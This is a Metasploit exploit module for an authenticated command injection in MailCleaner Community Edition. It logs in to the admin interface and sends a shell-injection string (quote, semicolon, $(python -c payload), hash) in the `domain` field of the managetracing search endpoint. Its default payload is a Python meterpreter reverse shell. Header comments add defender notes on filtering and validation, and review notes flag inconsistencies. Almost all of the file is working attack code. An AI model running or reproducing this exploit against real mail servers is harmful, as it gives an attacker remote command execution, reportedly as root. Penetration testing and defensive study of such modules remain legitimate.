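  # Metasploit module for the authenticated command injection in MailCleaner
  # Community Edition described in the advisory listed under 'References'.
  #
  # Flow: fetch a session cookie from admin/, log in with operator-supplied
  # credentials, then send a single POST to the managetracing search endpoint
  # whose `domain` field carries the payload.
  #
  # Defender notes:
  # * The `domain` form field is the only injected value. A `domain` value
  #   containing a quote, `;`, `$(` or `#` is not a hostname, so body-aware
  #   logging or filtering on admin/managetracing/search/search can flag it.
  # * The durable fix is server-side: validate `domain` against a strict
  #   hostname pattern and hand it to the backend service without a shell.
  #   See the referenced advisory for the vendor's remediation.
  # * A valid admin login is required, so restricting access to the admin
  #   interface and rotating admin credentials reduce exposure.
  class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    # Registers module metadata, the two payload targets and the options.
    #
    # @param info [Hash] metadata overrides merged in by update_info
    def initialize(info = {})
      super(update_info(info,
        'Name'           => "Mailcleaner Remote Code Execution",
        'Description'    => %q{
          This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
          operating system command under the context of the web server user which is root.

          /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
          operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
          ],
        'References'     =>
          [
            ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
          ],
        'DefaultOptions'  =>
          {
            'SSL' => true,
            'WfsDelay' => 5,
            'Payload'  => 'python/meterpreter/reverse_tcp'
          },
        'Platform'       => ['python', 'unix'],
        'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
        'Targets'        =>
          [
            [
              'Python payload',
              {
                'Platform' => 'python',
                'Arch' => ARCH_PYTHON,
              }
            ],
            [
              'Command payload',
              {
                'Platform' => 'unix',
                'Arch' => ARCH_CMD,
                'Payload' =>
                {
                  # 0x26 is '&'; it is excluded from generated command payloads.
                  'BadChars' => "\x26",
                }
              }
            ]
          ],
        # NOTE(review): the description says commands run as root, which does
        # not match 'Privileged' => false. Confirm which one is correct.
        'Privileged'     => false,
        'DisclosureDate' => "Dec 19 2018",
        'DefaultTarget'  => 0
      ))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
          OptString.new('USERNAME', [true, 'The username to login as']),
          OptString.new('PASSWORD', [true, 'The password to login with'])
        ]
      )
    end

    # @return [String] value of the USERNAME option
    def username
      datastore['USERNAME']
    end

    # @return [String] value of the PASSWORD option
    def password
      datastore['PASSWORD']
    end

    # Logs in to the admin interface.
    #
    # Sends a GET to admin/ to collect cookies, then POSTs the credentials
    # with those cookies attached. A 302 reply is treated as a successful
    # login. Failures abort the module through fail_with.
    #
    # @return [String] the cookie string collected before the login POST
    def auth
      print_status('Performing authentication...')

      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'admin/')
      })

      cookie = res&.get_cookies
      if cookie.nil? || cookie.empty?
        fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
      end

      # NOTE(review): the cookie issued before login is the one used for the
      # authenticated request later on, which suggests the application does
      # not rotate the session identifier at login. Confirm on the target.
      res = send_request_cgi({
        'method'    => 'POST',
        'uri'       => normalize_uri(target_uri.path, 'admin/'),
        'cookie'    => cookie,
        'vars_post' => {
          'username'  => username,
          'password' => password,
          'submit' => 'Log+in'
        }
      })

      if res&.code == 302
        # Report only the account name. Echoing the password would copy it
        # into console scrollback and any spooled or shared log.
        print_good("Awesome..! Authenticated as #{username}")
      else
        fail_with(Failure::NoAccess, 'Credentials are not valid.')
      end

      cookie
    end

    # Authenticates, wraps the encoded payload for the selected target and
    # submits it in the `domain` field of the managetracing search form.
    # The response to that request is not inspected.
    def exploit
      cookie = auth

      # auth aborts through fail_with on every failure path, so this guard
      # is only a safety net.
      fail_with(Failure::Unknown, 'Something went wrong!') if cookie.nil?

      print_status('Exploiting command injection flaw')

      # Both forms close the quoted argument, run the payload and comment out
      # the remainder of the server-side command line. These quote, `;` and
      # `#` characters are what input validation on `domain` must reject.
      cmd = if target['Arch'] == ARCH_PYTHON
              "';$(python -c \"#{payload.encoded}\");#"
            else
              "';#{payload.encoded};#"
            end

      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
        'cookie'    => cookie,
        'vars_post' => {
          'search' => rand_text_alpha(5),
          'domain' => cmd,
          'submit' => 1
        }
      })
    end
  end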